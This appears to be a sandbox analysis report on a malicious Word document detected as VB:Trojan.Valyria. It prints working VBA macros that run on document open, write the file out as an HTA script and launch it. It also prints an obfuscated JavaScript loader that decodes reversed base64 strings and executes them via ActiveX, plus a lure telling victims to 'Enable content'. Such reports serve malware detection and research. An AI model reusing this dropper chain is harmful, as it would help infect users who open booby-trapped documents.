Malicious
Classifications
-
Threat Names
Mal/Generic-S Mal/HTMLGen-A VB:Trojan.Valyria.5645
Dynamic Analysis Report
Created on 2021-11-12T21:19:00
instruct_11.21.doc.vir.doc
Word Document
Remarks
(0x0200004A): 192 dumps were skipped because they exceeded the maximum dump size of 16 MB. The largest one was 19 MB.
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filters: |
There are no files for this filter
There are no files in this analysis
File Name | Category | Type | Verdict | Actions |
---|
C:\Users\RDhJ0CNFevzX\Desktop\instruct_11.21.doc.vir.doc | Sample File | Word Document |
malicious
|
...
|
»
File Reputation Information
»
Verdict |
malicious
|
AV Matches (2)
»
Threat Name | Verdict |
---|---|
VB:Trojan.Valyria.5645 |
malicious
|
VB:Trojan.Valyria.5645 |
malicious
|
Office Information
»
Keywords | ath.txeNwoPwop\cilbup\sresu\:c |
Creator | ozdgjmh |
Last Modified By | Пользователь Windows |
Revision | 2 |
Create Time | 2021-11-10 09:34:00+00:00 |
Modify Time | 2021-11-10 09:34:00+00:00 |
Application | Microsoft Office Word |
App Version | 16.0000 |
Template | Normal |
Document Security | NONE |
Page Count | 1 |
Line Count | 42 |
Paragraph Count | 1 |
Word Count | 116 |
Character Count | 9917 |
Chars With Spaces | 10032 |
ScaleCrop | |
SharedDoc |
VBA Macros (2)
»
Macro #1: ThisDocument
»
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function keywords()
With ActiveDocument
girlKarolGirl = .BuiltInDocumentProperties("keywords").Value
End With
keywords = StrReverse(girlKarolGirl)
ActiveDocument.Content.Find.Execute FindText:="$1", ReplaceWith:=dowKarolYou, Replace:=wdReplaceAll
End Function
Public Function s(dowGirlLoad)
Set dowYouKarol = CreateObject("wscript.shell")
dowYouKarol.exec "c:\windows\explorer " & dowGirlLoad
End Function
Sub document_open()
main.karoline ("")
End Sub
Macro #2: main
»
Attribute VB_Name = "main"
Public Sub karoline(likeTubeLike)
doorLikeDow = ThisDocument.keywords
With ActiveDocument
.SaveAs2 FileName:=doorLikeDow, FileFormat:=2
End With
ThisDocument.s doorLikeDow
End Sub
Document Content Snippet
»
<$1h$1t$1m$1l$1>$1<$1b$1o$1d$1y$1>$1<$1d$1i$1v$1 $1i$1d$1=$1'$1y$1o$1u$1G$1i$1r$1l$1Y$1o$1u$1'$1 $1s$1t$1y$1l$1e$1=$1'$1f$1o$1n$1t$1-$1c$1o$1l$1o$1r$1:$1 $1#$10$10$10$1'$1>$1l$1a$1v$1e$1<$1/$1d$1i$1v$1>$1<$1d$1i$1v$1 $1i$1d$1=$1'$1k$1a$1r$1o$1l$1L$1i$1k$1e$1D$1o$1w$1'$1 $1s$1t$1y$1l$1e$1=$1'$1f$1o$1n$1t$1-$1c$1o$1l$1o$1r$1:$1 $1#$10$10$10$1'$1>$12$1F$1m$1c$1g$1c$1W$1a$1y$1x$1G$1T$1p$1t$1W$1Z$1E$19$12$1b$1y$1B$1S$1P$1g$14$1W$1Z$13$1B$1S$1Q$1j$1R$1X$1a$12$1V$1G$1W$1P$1J$1m$1a$1l$1N$1G$1d$1o$1I$1S$1b$1z$1h$1X$1b$1s$1J$1j$1L$14$11$1G$1b$1o$1R$1H$1d$1w$1J$1S$1K$17$1c$1W$1a$1y$1x$1G$1T$1p$1t$1W$1Z$1E$19$12$1b$1y$15$1y$1b$1w$1V$1m$1b$1o$1I$1y$1R$1F$1R$1l$1I$1s$1A$1i$1I$1o$1R$1H$1d$1w$1p$1z$1L$1v$1M$1H$1a$1v$1V$1H$1b$1k$1V$1m$1c$1l$1x$1G$1b$1p$19$1G$1d$10$1R$1m$1L$1j$19$1W$1b$1v$1I$12$1b$1v$1x$12$1a$1v$1E$1F$1b$1h$1p$10$1a$14$1M$1k$1N$12$1l$1V$1c$1J$1l$1X$1R$13$1J$1G$1Z$15$1B$1n$1Q$1I$1Z$13$1M$15$1p$1k$1U$1v$1c$1n$1c$1X$1d$1l$1T$1D$ ... |
Extracted Image Texts (1)
»
Image 1: image1.gif
»
This document created in previous version of Hicrosoft Office Word
To view or edit this document. please click “Enable editing” button
on the top bar. and then click “Enable content”
vbaProject.bin | Embedded File | Unknown |
malicious
|
...
|
»
File Reputation Information
»
Verdict |
malicious
|
Names | Mal/Generic-S |
AV Matches (1)
»
Threat Name | Verdict |
---|---|
VB:Trojan.Valyria.5645 |
malicious
|
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat | Modified File | Stream |
clean
|
...
|
»
Extracted JavaScripts (4)
»
JavaScript #1
»
function likeTubeDoor(loveDowPow){return(new ActiveXObject(loveDowPow));}function loadLoveLove(girlNextPow){return(loadDowDow.getElementById(girlNextPow).innerHTML);}function tubeNextPow(likeLoadNext){return('cha' + likeLoadNext);}function dowYouLike(doorLoadDoor){var girlTubePow = loadLoveLove('karolPowYou');var likeDoorDoor = "";var youPowLoad, tubeGirlTube, girlLoadGirl;var karolKarolLoad, doorLikeKarol, dowDoorLove, nextNextYou;var youDoorKarol = 0;doorLoadDoor = doorLoadDoor.replace(/[^A-Za-z0-9\+\/\=]/g, "");while(youDoorKarol < doorLoadDoor.length){karolKarolLoad = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));doorLikeKarol = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));dowDoorLove = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));nextNextYou = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));youPowLoad = (karolKarolLoad << 2) | (doorLikeKarol >> 4);tubeGirlTube = ((doorLikeKarol & 15) << 4) | (dowDoorLove >> 2);girlLoadGirl = ((dowDoorLove & 3) << 6) | nextNextYou;likeDoorDoor = likeDoorDoor + String.fromCharCode(youPowLoad);if(dowDoorLove != 64){likeDoorDoor = likeDoorDoor + String.fromCharCode(tubeGirlTube);}if(nextNextYou != 64){likeDoorDoor = likeDoorDoor + String.fromCharCode(girlLoadGirl);}}return(likeDoorDoor);}function karolLoadNext(tubeTubeLove){return tubeTubeLove.split('').reverse().join('');}function loveNextKarol(likeLoadNext){return(karolLoadNext(dowYouLike(karolLoadNext(likeLoadNext))));}function karolNextDoor(likeLoadNext, nextNextLike){return(likeLoadNext.split(nextNextLike));}doorPowLove = window;loadDowDow = document;doorPowLove.moveTo(-10, -10);var tubeNextDow = loadLoveLove('karolLikeDow').split("|||");var tubeNextDoor = loveNextKarol(tubeNextDow[0]);var likeGirlTube = loveNextKarol(tubeNextDow[1]);
JavaScript #2
»
function tubeYouDow(tubeLoadLove){doorPowLove[karolLoadNext(loadLoveLove('youGirlYou'))](tubeLoadLove);}
JavaScript #3
»
Call tubeYouDow(tubeNextDoor) : Call tubeYouDow(likeGirlTube)
JavaScript #4
»
doorPowLove['close']();
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT | Dropped File | Unknown |
clean
Known to be clean.
|
...
|
»
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\YPFIZL51\error[1] | Dropped File | HTML |
clean
Known to be clean.
|
...
|
»
Extracted JavaScripts (1)
»
JavaScript #1
»
var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";
var L_ErrorNumber_Text = "Error: ";
var L_ContinueScript_Message = "Do you want to debug the current page?";
var L_AffirmativeKeyCodeLowerCase_Number = 121;
var L_AffirmativeKeyCodeUpperCase_Number = 89;
var L_NegativeKeyCodeLowerCase_Number = 110;
var L_NegativeKeyCodeUpperCase_Number = 78;
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\0GQKFXIA\error[1] | Dropped File | Text |
clean
Known to be clean.
|
...
|
»
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\VD7IA8JG\warning[1] | Dropped File | Image |
clean
|
...
|
»